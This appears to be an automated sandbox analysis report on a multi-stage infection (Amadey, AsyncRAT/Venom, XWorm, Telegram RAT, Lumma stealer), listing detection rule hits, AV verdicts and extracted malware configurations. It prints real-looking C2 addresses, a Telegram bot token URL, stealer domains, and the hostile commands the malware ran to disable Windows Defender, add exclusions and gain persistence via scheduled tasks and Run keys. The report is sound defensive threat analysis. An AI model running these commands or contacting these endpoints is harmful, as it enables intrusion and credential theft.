14.2.vQeyqr1.exe.1e610000.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xdab4:$q1: Select * from Win32_CacheMemory 0xdaf4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb42:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb90:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
14.2.vQeyqr1.exe.1e730000.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.vQeyqr1.exe.1e730000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.vQeyqr1.exe.1e730000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.vQeyqr1.exe.1e730000.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11feb:$cnc4: POST / HTTP/1.1
14.0.vQeyqr1.exe.ca0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.0.vQeyqr1.exe.ca0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.0.vQeyqr1.exe.ca0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.0.vQeyqr1.exe.ca0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11feb:$cnc4: POST / HTTP/1.1
14.2.vQeyqr1.exe.1470000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x329d:$s6: Set-MpPreference -MAPSReporting 0 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x3622:$e2: Add-MpPreference -ExclusionPath
14.2.vQeyqr1.exe.1470000.1.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
14.2.vQeyqr1.exe.1e730000.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
14.2.vQeyqr1.exe.1e730000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.vQeyqr1.exe.1e730000.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xec57:$s6: VirtualBox 0xebb5:$s8: Win32_ComputerSystem 0x11ad0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11b6d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11c82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x101eb:$cnc4: POST / HTTP/1.1
14.2.vQeyqr1.exe.1e610000.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.vQeyqr1.exe.1e610000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf8b4:$q1: Select * from Win32_CacheMemory 0xf8f4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf942:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf990:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
9.2.skotes.exe.470000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.file.exe.e70000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.470000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\224de4e34e.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\224de4e34e.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wemyp0ph.j1f.ps1

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 1540, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 6964, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, ParentProcessId: 6500, ParentProcessName: vQeyqr1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe', ProcessId: 2644, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Avira: detection malicious, Label: HEUR/AGEN.1313061
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1313061
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Mutex": "hgzuiajogwnqs", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kFccRRCzW3jG/otfy1Jkj43o0+4OxnCs1oCpmxYTk3m7JpGlsS6RGQjGzdX6D5uOIuCbvZ6LcErP2gcbdu30OOKRo2h1VjJW/J05YD4xFgwBHdMxA1DXT6Q4kwhO3cK5KTA9hcSqIF+Z0LOI9nl3fyGZmlcmxLX5iHGRq64bny8=", "External_config_on_Pastebin": "https://pastebin.com/raw/dDuwSpUA"}
Source: 00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["45.200.149.15"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: vQeyqr1.exe.6500.14.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage"}
Source: 950932ab59.exe.424.52.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "energyaffai.lat", "rapeflowwj.lat", "grannyejh.lat"], "Build id": "PvbArZ--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\1018906001\003.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\003[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sweepyribs.lat
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000034.00000003.3408815508.0000000005280000.00000004.00001000.00020000.00000000.sdmp	String decryptor: PvbArZ--
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: 45.200.149.15
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: 7000
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: <123456789>
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: <Xwormmm>
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: XWorm V5.6
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	String decryptor: USB.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: Unhook.pdb source: RzAAR0y.exe, 0000000B.00000002.4692082681.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp, RzAAR0y.exe, 0000000B.00000000.2790737030.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp
